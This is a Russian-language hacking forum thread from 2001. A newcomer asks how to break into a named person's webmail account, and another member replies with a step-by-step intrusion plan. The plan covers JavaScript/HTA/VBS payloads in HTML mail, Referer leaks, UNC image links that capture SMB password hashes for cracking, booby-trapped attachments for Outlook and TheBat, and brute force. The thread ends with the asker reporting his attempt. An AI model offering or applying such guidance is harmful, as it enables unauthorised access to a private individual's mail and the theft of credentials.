Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | | |
Рассказ 10.09.01 22:31 Число просмотров: 871
Автор: Alexis Статус: Незарегистрированный пользователь
|
Я создал тестовый ящик и для начала (с конца) решил попробовать самый тупой способ - брута-форс перебор паролей
с помощью маленького листа слов. Скачал себе программу BrutusAET2...
Она не смогла выполнить ни одной попытки (attempts=0). То ли я не во всех настройках не разобрался, то ли у них
защита против таких программ стоит...
Админы меня, видимо, вычислили, потому что с Comstar-dialupовского IP ко мне пришел милый троянчик Deep Throat.
Троянчика я убил - только на это меня и хватило...
Чувствую себя гнусным ламером...
:(((
:)))
|
|
<hacking>
|
Вопрос по взлому 06.09.01 00:38
Автор: Alexis Статус: Незарегистрированный пользователь
|
Привет всем! Я еще не хакер, а только учусь... :)
Очень надо взломать веб-почту одного человека. Я знаю только сервер и логин.
Как лучше сделать, посоветуйте, люди добрые! :)
Алекс.
|
|
Руководство 07.09.01 17:20
Автор: paganoid Статус: Member
|
> Привет всем! Я еще не хакер, а только учусь... :)
>
> Очень надо взломать веб-почту одного человека. Я знаю
> только сервер и логин.
1) Для тестирования создай себе ящик на том же сервере.
2) Если жертва пользуется при заборе почты только вебом
а) если разрешается использование javascript
то действуй так - шли письмо в формате html и пытайся вставить туда javascript или iframe. Если сработало, вставляй в письмо скрипт на внедрение какого-нить hta скрипта (такой баг есть в IE, когда javascript может создавать файлы на диске). В сам hta скрипт укатываешь небольшую программку на VBS, которая делает что нужно. Недавно появился не менее веселый баг, но это другая история...
б) разрешается вставлять картинки
Если javascript не удается вставить, то пытайся вставить в письмо картинку, физически расположенную натвоёмсервере. При запросе этой картинки с твоего сервера ты можешь проанализировать переданный бровсером Referer и попытаться войти в ящик. Также можно вставить картинку, чтобы она запрашивалась а-ля по microsift нетворк, т.е. IMG SRC="\\IP_ТВОЕЙ_МАШИНЫ\SHARE\porno.jpg" , поставить себе сниффер и узнать, как машина жертвы пытаеца подконнектица к твоей, перехватить хеш пароля и брутфорсить его лофткраком.
3) Если жертва не использует веб
вступаешь с жертвой в левую переписку, по служебным заголовкам писем узнаешь, какая почтовая программа используется
а) она использует Outlук - приблизительно все тоже самое, что и с jaba-скриптом. Ищешь эксплойт и калякаешь злобные html \ vbs . Или конструируешь письмо со злобным хедером и веселым аттачментом, который будет запускаца. Письма такие удастся послать только с помощью специализированных прог или самому накалякать небольшой скрипт на Perl\C\PHP\VB\и.т.п.
б) жертва использует TheBat.
Уповаешь на то, что жертва редко обновляет версии и у него версия ~< 1.42 . Конструируешь письмо со злобным хедером и веселым аттачментом, который будет класца в авторан.
4) Если это не прокатило, то заряжаешь брутфорс-перебор пароля.
5) Если это не прокатило, берешь паяльник, крючья для мяса и идешь к своему другу спрашивать пароль.
> Как лучше сделать, посоветуйте, люди добрые! :)
злые, но справедливые хехе. Все только для образовательных целей :)
>
> Алекс.
|
| |
Руководство 09.09.01 18:51
Автор: Alexis Статус: Незарегистрированный пользователь
|
Ау!!!
Paganoid, where are you?
Где ты есть, куда пропал?
Мне есть что рассказать!!! (Произвел пробу пера... ;) )
Алекс.
|
| |
Thanks 08.09.01 14:45
Автор: Alexis Статус: Незарегистрированный пользователь
|
БОЛЬШОЕ спасибо!
По твоему руководству и у меня должно получиться... :)
Самое интересное для меня было про сниффер... Где бы взять-то? :))
Вообще я не для себя стараюсь, меня попросили. Хорошая знакомая. Дело справедливое - я не мог не согласиться
помочь, чем смогу... :))
У вас тут как, и-мэйл оставлять не принято? Или где-то есть список зарегистрированных пользователей
с и-мэйлами? ;) Я бы тебе рассказал, как у меня пойдут дела... ;)
Алекс.
|
| | |
Re: Thanks 10.09.01 11:43
Автор: paganoid Статус: Member
|
> БОЛЬШОЕ спасибо!
>
> По твоему руководству и у меня должно получиться... :)
>
> Самое интересное для меня было про сниффер... Где бы
> взять-то? :))
Хм.. да их много.. Ну в том же L0pht Crack есть встроенный снифер SMB хешей.. Он тебе наилучшим образом и подойдет...
>
> Вообще я не для себя стараюсь, меня попросили. Хорошая
> знакомая. Дело справедливое - я не мог не согласиться
> помочь, чем смогу... :))
>
> У вас тут как, и-мэйл оставлять не принято? Или где-то есть
> список зарегистрированных пользователей
> с и-мэйлами? ;) Я бы тебе рассказал, как у меня пойдут
> дела... ;)
Ну вот здесь и расскажи :)))
>
> Алекс.
|
| | | |
Рассказ 10.09.01 22:31
Автор: Alexis Статус: Незарегистрированный пользователь
|
Я создал тестовый ящик и для начала (с конца) решил попробовать самый тупой способ - брута-форс перебор паролей
с помощью маленького листа слов. Скачал себе программу BrutusAET2...
Она не смогла выполнить ни одной попытки (attempts=0). То ли я не во всех настройках не разобрался, то ли у них
защита против таких программ стоит...
Админы меня, видимо, вычислили, потому что с Comstar-dialupовского IP ко мне пришел милый троянчик Deep Throat.
Троянчика я убил - только на это меня и хватило...
Чувствую себя гнусным ламером...
:(((
:)))
|
|
|
подробно о проекте
Анализ криптографических сетевых...
